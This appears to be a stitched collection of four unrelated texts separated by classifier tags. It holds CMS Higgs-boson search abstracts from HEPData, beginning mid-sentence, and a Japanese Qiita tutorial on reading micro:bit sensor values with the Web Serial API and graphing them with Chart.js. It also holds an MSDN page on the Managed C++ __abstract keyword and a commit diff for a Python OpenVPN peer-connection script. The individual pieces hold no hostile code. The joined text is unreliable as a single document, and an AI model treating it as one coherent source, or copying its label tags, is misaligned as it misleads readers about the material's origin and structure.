TeV, recorded by the CMS experiment at the CERN LHC. Several final states of the $\mathrm{H \to WW}$ and $\mathrm{H \to ZZ}$ decays are analyzed. The combined upper limit at the 95% confidence level on the product of the cross section and branching fraction exclude a Higgs boson with standard model-like couplings and decays in the $m_{\mathrm{H}}$ range from 145 to 1000 GeV. We also interpret the results in the context of an electroweak singlet extension of the standard model. 5 data tables Upper limits at 95\% CL on the cross section for a heavy Higgs boson decaying to a pair of W bosons as a function of its mass and its width relative to a SM-like Higgs boson. Upper limits at 95\% CL on the cross section for a heavy Higgs boson decaying to a pair of Z bosons as a function of its mass and its width relative to a SM-like Higgs boson. Upper limits at 95% CL on the cross section for a heavy Higgs boson as a function of its mass and its width relative to a SM-like Higgs boson. Both, gluon-gluon fusion and VBF production processes are combined, assuming a SM-like ratio between the two. More… Search for neutral MSSM Higgs bosons decaying to a pair of tau leptons in pp collisions The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. JHEP 1410 (2014) 160, 2014. Inspire Record 1310838 DOI 10.17182/hepdata.70761 A search for neutral Higgs bosons in the minimal supersymmetric extension of the standard model (MSSM) decaying to tau-lepton pairs in pp collisions is performed, using events recorded by the CMS experiment at the LHC. The dataset corresponds to an integrated luminosity of 24.6 fb$^{−1}$, with 4.9 fb$^{−1}$ at 7 TeV and 19.7 fb$^{−1}$ at 8 TeV. To enhance the sensitivity to neutral MSSM Higgs bosons, the search includes the case where the Higgs boson is produced in association with a b-quark jet. No excess is observed in the tau-lepton-pair invariant mass spectrum. Exclusion limits are presented in the MSSM parameter space for different benchmark scenarios, m$_{h}^{max}$ , m$_{h}^{mod +}$ , m$_{h}^{mod −}$ , light-stop, light-stau, τ-phobic, and low-m$_{H}$. Upper limits on the cross section times branching fraction for gluon fusion and b-quark associated Higgs boson production are also given. 4 data tables likelihood scan of the (gg$\rightarrow\phi\rightarrow\tau\tau$) - (gg$\rightarrow$bb$\phi\rightarrow\tau\tau$) - plane the with 40000 grid points at each hypothetical higgs mass, m$_\phi$, at $\sqrt{s}$ = 8 TeV testing the observation against a background hypothesis not including the Standard Model Higgs boson at 125 GeV. likelihood scan of the (gg$\rightarrow\phi\rightarrow\tau\tau$) - (gg$\rightarrow$bb$\phi\rightarrow\tau\tau$) - plane the with 40000 grid points at each hypothetical higgs mass, m$_\phi$, at $\sqrt{s}$ = 8 TeV testing the $\textbf{asimov dataset of the sum of all backgrounds not including the Standard Model Higgs boson at 125 GeV against a background hypothesis not including the Standard Model Higgs boson at 125 GeV}. likelihood scan of the (gg$\rightarrow\phi\rightarrow\tau\tau$) - (gg$\rightarrow$bb$\phi\rightarrow\tau\tau$) - plane the with 40000 grid points at each hypothetical higgs mass, m$_\phi$, at $\sqrt{s}$ = 8 TeV testing the observation against a background hypothesis including the Standard Model Higgs boson at 125 GeV. More… Search for neutral MSSM Higgs bosons decaying into a pair of bottom quarks The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. JHEP 1511 (2015) 071, 2015. Inspire Record 1380177 DOI 10.17182/hepdata.70722 A search for neutral Higgs bosons decaying into a $ \mathrm{b}\overline{\mathrm{b}} $ quark pair and produced in association with at least one additional b quark is presented. This signature is sensitive to the Higgs sector of the minimal supersymmetric standard model (MSSM) with large values of the parameter tan β. The analysis is based on data from proton-proton collisions at a center-of-mass energy of 8 TeV collected with the CMS detector at the LHC, corresponding to an integrated luminosity of 19.7 fb$^{−1}$. The results are combined with a previous analysis based on 7 TeV data. No signal is observed. Stringent upper limits on the cross section times branching fraction are derived for Higgs bosons with masses up to 900 GeV, and the results are interpreted within different MSSM benchmark scenarios, m$_{h}^{max}$ , m$_{h}^{mod +}$ , m$_{h}^{mod −}$ , light-stau and light-stop. Observed 95% confidence level upper limits on tan β, ranging from 14 to 50, are obtained in the m$_{h}^{mod +}$ benchmark scenario. 3 data tables Expected and observed 95% CL upper limits on sigma(pp->b+ H(MSSM)+X) * B(H(MSSM) -> bb) in pb as a function of m(H(MSSM)), where H(MSSM) denotes a generic Higgs-like state, as obtained from the 8 TeV data. Expected and observed 95% CL upper limits on tan(beta) as a function of mA in the mh-max benchmark scenario for mu=+200 GeV, obtained from a combination of the 7 and 8 TeV data. Expected and observed 95% CL upper limits on tan(beta) as a function of mA in the mh-mod+ benchmark scenario for mu=+200 GeV, obtained from a combination of the 7 and 8 TeV data. Search for neutral MSSM Higgs bosons decaying to $\mu^{+} \mu^{-}$ in pp collisions at $ \sqrt{s} =$ 7 and 8 TeV The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. Phys.Lett. B752 (2016) 221-246, 2016. Inspire Record 1386854 DOI 10.17182/hepdata.70526 A search for neutral Higgs bosons predicted in the minimal supersymmetric standard model (MSSM) for μ+μ− decay channels is presented. The analysis uses data collected by the CMS experiment at the LHC in proton–proton collisions at centre-of-mass energies of 7 and 8 TeV, corresponding to integrated luminosities of 5.1 and 19.3 fb −1 , respectively. The search is sensitive to Higgs bosons produced either through the gluon fusion process or in association with a bb‾ quark pair. No statistically significant excess is observed in the μ+μ− mass spectrum. Results are interpreted in the framework of several benchmark scenarios, and the data are used to set an upper limit on the MSSM parameter tan⁡β as a function of the mass of the pseudoscalar A boson in the range from 115 to 300 GeV. Model independent upper limits are given for the product of the cross section and branching fraction for gluon fusion and b quark associated production at s=8 TeV . They are the most stringent limits obtained to date in this channel. 3 data tables The 95% CL upper limit on tan B as a function of mA, after combining the data from the two event categories at the two centre-of-mass energies (7 and 8 TeV). The results are obtained in the framework of the mh-mod+ benchmark scenario. The 95% CL limit on the product of the cross section and the decay branching fraction to two muons as a function of mPHI, obtained from a model independent analysis of the data. The results refer to b quark associated production, obtained using data collected at swrt(s) = 8 TeV. The 95% CL limit on the product of the cross section and the decay branching fraction to two muons as a function of mPHI, obtained from a model independent analysis of the data. The results refer to gluon-fusion production, obtained using data collected at swrt(s) = 8 TeV.
__label__pos
0.89719
LoginSignup 8 2 More than 3 years have passed since last update. Web Serial API を使って micro:bit からセンサーの値(XYZ)を読み取る&リアルタイムなグラフ化 Last updated at Posted at 2021-02-09 この記事は、以下の内容の続きです。 ●Web Serial API を使って micro:bit からセンサーの値を読み取る(途中段階) - Qiita  https://qiita.com/youtoy/items/9606c58369796a65f8f5 ちなみに、Web Serial API 関連の話は、上記の記事とは別に以下の記事も書いています。 冒頭に記載した記事の内容では、micro:bit から値を読み取れてはいたものの、意図したとおりには読み取れていない問題があったため、それを解決するための対応をしたのがこの記事の内容です。 また、それと合わせて読み取った値のグラフ化も行ってみました。 最終的な完成形は以下となります。 前の記事で発生していた問題を解決する Webサイト側の内容修正 前の記事で発生していた問題に関し、以下のサイトの情報を見つつ対応しました。 ●Read from and write to a serial port  https://web.dev/serial/ 以下に、改善後のソースコードを掲載します。 前の記事の内容と差があるところにコメントを入れました。 <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Web Serial(Read)</title> </head> <body> <h1>Web Serial(Read)</h1> <button onclick="onStartButtonClick()">接続</button> <script> // ▼追加した部分1 class LineBreakTransformer { constructor() { this.chunks = ""; } transform(chunk, controller) { this.chunks += chunk; const lines = this.chunks.split("\r\n"); this.chunks = lines.pop(); lines.forEach((line) => controller.enqueue(line)); } flush(controller) { controller.enqueue(this.chunks); } } async function onStartButtonClick() { try { const port = await navigator.serial.requestPort(); await port.open({ baudRate: 115200 }); while (port.readable) { // ▼追加した部分2 const textDecoder = new TextDecoderStream(); const readableStreamClosed = port.readable.pipeTo(textDecoder.writable); const reader = textDecoder.readable .pipeThrough(new TransformStream(new LineBreakTransformer())) .getReader(); try { while (true) { const { value, done } = await reader.read(); if (done) { console.log("Canceled"); break; } // ▼ここでデコードの処理をしていたのを削除 console.log(value); } } catch (error) { console.log("Error: Read"); console.log(error); } finally { reader.releaseLock(); } } } catch (error) { console.log("Error: Open"); console.log(error); } } </script> </body> </html> micro:bit のプログラム(少し手を加えてみる) micro:bit のプログラムは前回と同じものでも良かったのですが、加速度センサーの値を XYZ の 3種類全て書きだすように変えてみました。 マイクロビットのプログラム(XYZ).jpg プログラムを実行してみる シリアル通信で読み出された値は、コンソールに以下のように出力されました。 出力(改善版).jpg micro:bit側で 1行ずつ書きだした内容が、読み取り側でも 1行ずつ表示されるようになりました。 センサーの値をグラフ化 以前、以下の記事を書いた際に使った Chart.js とプラグインを使い、加速度センサーの値をグラフ化してみます。 ●【JavaScript 2020】 MQTT で受信したデータを Smoothie Charts(smoothie.js)以外でリアルタイムにグラフ化: Chart.js とプラグインを利用 - Qiita  https://qiita.com/youtoy/items/252f255c9d794bf3d964 ソースコードと実行結果 グラフ化のための処理を加えたソースコードは以下のとおりです。 <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Web Serial(グラフ化)</title> <script src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.29.1/moment-with-locales.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/[email protected]"></script> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/chartjs-plugin-streaming.min.js"></script> </head> <body> <h1>Web Serial(グラフ化)</h1> <button onclick="onStartButtonClick()">接続</button> <br> <canvas id="myChart"></canvas> <script> class LineBreakTransformer { constructor() { this.chunks = ""; } transform(chunk, controller) { this.chunks += chunk; const lines = this.chunks.split("\r\n"); this.chunks = lines.pop(); lines.forEach((line) => controller.enqueue(line)); } flush(controller) { controller.enqueue(this.chunks); } } const ctx = document.getElementById("myChart").getContext("2d"); let chart = new Chart(ctx, { type: "line", data: { datasets: [ { label: 'X', borderColor: 'rgb(200, 50, 50)', backgroundColor: 'rgba(200, 50, 50, 0.2)', data: [], }, { label: 'Y', borderColor: 'rgb(50, 50, 200)', backgroundColor: 'rgba(50, 50, 200, 0.2)', data: [], }, { label: 'Z', borderColor: 'rgb(50, 200, 50)', backgroundColor: 'rgba(50, 200, 50, 0.2)', data: [], }, ], }, options: { scales: { xAxes: [ { type: "realtime", realtime: { delay: 500, }, }, ], }, }, }); async function onStartButtonClick() { try { const port = await navigator.serial.requestPort(); await port.open({ baudRate: 115200 }); while (port.readable) { const textDecoder = new TextDecoderStream(); const readableStreamClosed = port.readable.pipeTo(textDecoder.writable); const reader = textDecoder.readable .pipeThrough(new TransformStream(new LineBreakTransformer())) .getReader(); try { while (true) { const { value, done } = await reader.read(); if (done) { console.log("Canceled"); break; } console.log(value); if(value.slice(0,1)==="X") { chart.data.datasets[0].data.push({ x: Date.now(), y: value.slice(2), }); } else if(value.slice(0,1)==="Y") { chart.data.datasets[1].data.push({ x: Date.now(), y: value.slice(2), }); } else if(value.slice(0,1)==="Z") { chart.data.datasets[2].data.push({ x: Date.now(), y: value.slice(2), }); } chart.update({ preservation: true, }); } } catch (error) { console.log("Error: Read"); console.log(error); } finally { reader.releaseLock(); } } } catch (error) { console.log("Error: Open"); console.log(error); } } </script> </body> </html> このグラフ化の処理を加えたものを実行すると、冒頭に掲載した動画のようなグラフ化が行えます。 このように、Web Serial API を使って micro:bit からセンサーの値を読み取り、それを Webサイト上でリアルタイムにグラフ化することができました。 追記 ソースコードなどは以下の GitHub にも置きました。  https://github.com/yo-to/WebSeriaAPI/tree/main/examples/02_read_microbit_and_graph_drawing 8 2 0 Register as a new user and use Qiita more conveniently 1. You get articles that match your needs 2. You can efficiently read back useful information 3. You can use dark theme What you can do with signing up 8 2
__label__pos
0.867982
Export (0) Print Expand All __abstract Visual Studio .NET 2003 Declares a managed class that cannot be instantiated directly. __abstract class-specifier __abstract struct-specifier Remarks The __abstract keyword declares that the target class can only be used as a base class of another class. Applying __abstract to a class or structure does not imply that the result is a __gc class or __gc structure. Differing from the C++ notion of an abstract base class, a class with the __abstract keyword can define its member functions. For more information on __abstract, see 17 __abstract keyword. Note   The __abstract keyword is not allowed when used with the __value or __sealed keyword and redundant when used with the __interface keyword. Example In the following example, the Derived class is derived from an abstract base class (Base). Instantiation is then attempted on both, but only Derived is successful. // keyword__abstract.cpp // compile with: /clr #using <mscorlib.dll> __abstract __gc class Base { int BaseFunction() { return 0; } }; __gc class Derived: public Base { }; int main() { Base* MyBase = new Base(); // C3622 Error: cannot instantiate an abstract class Derived* MyDerived = new Derived(); return 0; } See Also Managed Extensions for C++ Reference | __value | Delegates in Managed Extensions for C++ | C++ Keywords Show: © 2015 Microsoft
__label__pos
0.996326
Commit bc5d0fc1 authored by Ulysse Beaugnon's avatar Ulysse Beaugnon Vifibnet now establish a few random connection from a list a given peers and... Vifibnet now establish a few random connection from a list a given peers and change some evry 2 minutes parent cb4cb822 ......@@ -2,6 +2,7 @@ import argparse, errno, os, subprocess, sys, time import upnpigd import openvpn import random VIFIB_NET = "2001:db8:42::/48" ......@@ -37,19 +38,78 @@ def getConfig(): _('--ca', required=True, help='Path to the certificate authority') _('--key', required=True, help='Path to the rsa_key') _('--cert', required=True, help='Pah to the certificate') # connections establishement _('--max-peer', help='the number of peers that can connect to the server', default='10') # TODO : use it _('--client-count', help='the number servers the peers try to connect to', default = '2') _('--refresh-time', help='the time (seconds) to wait before changing the connections', default = '20') # TODO : use it _('--refresh-count', help='The number of connections to drop when refreshing the connections', default='1') # TODO : use it # Temporary args _('--ip', required=True, help='IPv6 of the server') config = parser.parse_args() def startNewConnection(): try: peer = random.choice(avalaiblePeers.keys()) if config.verbose > 2: print 'Establishing a connection with ' + peer del avalaiblePeers[peer] connections[peer] = openvpn.client(config, peer) except Exception: pass # TODO : def killConnection(peer): if config.verbose > 2: print 'Killing the connection with ' + peer subprocess.Popen.kill(connections[peer]) del connections[peer] avalaiblePeers[peer] = 1194 # TODO : give the real port def refreshConnections(): try: for i in range(0, int(config.refresh_count)): peer = random.choice(connections.keys()) killConnection(peer) except Exception: pass for i in range(len(connections), int(config.client_count)): startNewConnection() def main(): # init variables global connections global avalaiblePeers # the list of peers we can connect to avalaiblePeers = { '10.1.4.2' : 1194, '10.1.4.3' : 1194, '10.1.3.2' : 1194 } connections = {} # to remember current connections getConfig() if config.ip != 'none': serverProcess = openvpn.server(config, config.ip) else: client1Process = openvpn.client(config, '10.1.4.2') (externalIp, externalPort) = upnpigd.GetExternalInfo(1194) try: del avalaiblePeers[externalIp] except Exception: pass # establish connections serverProcess = openvpn.server(config, config.ip) for i in range(0, int(config.client_count)): startNewConnection() # main loop try: while True: time.sleep(float(config.refresh_time)) refreshConnections() except KeyboardInterrupt: pass if __name__ == "__main__": main() # TODO : pass the remote port as an argument to openvpn # TODO : remove incomming connections from avalaible peers ......@@ -29,8 +29,8 @@ def server(config, ip): def client(config, serverIp): return openvpn(config, '--nobind', '--tls-client', '--remote', serverIp, '--up', 'up-client') '--nobind', '--tls-client', '--remote', serverIp, '--up', 'up-client') ......@@ -22,7 +22,7 @@ def ForwardViaUPnP(localPort): def GetLocalIp(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(('8.8.8.8', 0)) s.connect(('10.8.8.8', 0)) return s.getsockname()[0] ...... Markdown is supported 0% or You are about to add 0 people to the discussion. Proceed with caution. Finish editing this message first! Please register or to comment
__label__pos
0.901283